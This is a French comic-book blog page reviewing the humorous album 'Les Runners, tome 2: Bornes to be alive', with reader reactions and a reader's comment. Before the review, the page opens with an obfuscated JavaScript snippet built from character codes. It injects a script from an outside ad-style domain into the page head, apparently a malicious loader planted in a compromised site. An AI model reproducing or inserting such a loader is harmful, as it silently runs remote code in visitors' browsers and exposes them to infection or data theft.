Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,101,108,108,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

    Running gags en pleine nature

     Les Runners, tome 2: Bornes to be alive, Sti (scénario), Buche (dessin). Editions Bamboo, 48 pages, 10,95 euros.

    Le “déconfinement” actuel donne des envies de grand air et d’évasion dans la nature. C’est aussi l’aspiration des “runners” dévoilés dans le tome précédent.

    Après avoir découvert – pour des motifs un peu spécieux – l’univers du “running” et être parvenu au sommet du genre en réalisant son premier marathon, Fred, le héros récurrent de ces histoires, passe désormais à la phase supérieure: le “trail”, la course en pleine nature, mais aussi la course d’orientation sportive jusqu’à un nouvel objectif ultime: l’ultra-trail !

    Après les Seignors, qui parvient à dépeindre quelques traits caractéristiques de l’univers des EHPAD dans une approche résolument humoristique et légère (ce qui n’est pas une mince réussite), le scénariste havrais Sti (Ronan Lefebvre) s’est donc mis à la course. Ou, s’il ne l’a pas réellement fait de cette manière, il est parvenu à en décrire de manière précise quelques tics ou figures imposées.

    Après la recherche du bon matériel, le vocabulaire ésotérique des coureurs, ce sont cette fois, entre autre, la mode des “dessins de parcours de course par GPS” et autres gadgets technologiques qui sont égratignés avec humour.

    Le principe de l’album demeure, lui, identique: une succession de planches-gag qui s’inscrit dans une continuité narrative globale.

    Au-delà des gags, parfois faciles et gentillets, c’est ce qui faisait l’originalité du premier tome de cette nouvelle série thématique – dont les éditions Bamboo se sont fait une spécialité. C’est encore plus le cas cette fois. Avec une foulée qui prend de l’assurance et un dessin – toujours signé Buche (l’auteur de Franky Snow) – joyeusement coloré dans son style “gros nez” sympathique.

     

    Commentez ou exprimez-vous grâce aux emojis !
    0
    J'AIMEJ'AIME
    0
    J'ADOREJ'ADORE
    0
    HahaHaha
    0
    WOUAHWOUAH
    0
    SUPER !SUPER !
    0
    TRISTETRISTE
    0
    GrrrrGrrrr
    Merci !

    Tags:

    • Journaliste de profession, rédacteur en chef adjoint (du Courrier picard) de fonction et amateur de bande dessinée par passion, je préfère parler ici d'albums que j'apprécie (avec éclectisme) plutôt que de ceux que je n'aime pas (et qui peuvent plaire à d'autres). Et ce en toute liberté. Cet espace est aussi l'occasion d'évoquer la vie (régionale en premier lieu) de la bande dessinée et parfois au-delà celle du graphisme, du dessin de presse ou des journaux et revues en lien avec l'un ou l'autre. Précisons que la plupart des illustrations utilisées dans ce blog ont pour copyrights leurs auteurs et éditeurs respectifs. Celles-ci visant à présenter leurs œuvres. A leur demande éventuelle, elles seront retirées.

    • Show Comments

    • François Membre

      Bonjour Daniel,
      Peut-être te souviens-tu de moi ? Pendant quelques années j’ai participé aux “Bulles picardes” où j’avais été amené par David Guévart.
      A regret (trop de travail), j’ai du interrompre ma participation au blog et me consacrer pendant quatre années au dossier des Pieds Nickelés dans la réédition Hachette (plus de 200 numéros).
      Bénéficiant de plus de temps, je souhaiterai –si tu es d’accord– retrouver une place dans les Bulles picardes comme chroniqueur en fournissant au minimum un texte (environ 1500 signes) par semaine.

    Your email address will not be published. Required fields are marked *

    comment *

    • name *

    • email *

    • website *

    You May Also Like

    Un autre homme qui marche

    Furari, de Jirô Taniguchi, éditions Casterman, 212 pages, 16 euros. L’homme qui marche demeure ...

    Un bon plan sur la Comète

    Paulette Comète, tome 2: Reine des gangsters intérimaires, de Mathieu Sapin et Christian Rossi, ...

    Djizus crise

      Djizus is back, Zidrou, Jardi, Arino, éditions Fluide glacial, 48 pages, 10,80 euros. ...

    Il était une fois… trois jolis contes de faits

              A l’origine des contes : Pinocchio, Philippe Bonifay (scénario), ...

    La guerre de Louis Barthas, un Poilu qui n’aimait pas la faire

    Les carnets de guerre de Louis Barthas, 1914-1918, adaptation graphique de Fredman. Editions La ...

    1789 comme jamais !

    Révolution, tome I: liberté,  Younn Locard et Florent Grouazel, Actes Sud, collection L’an 2, 328 ...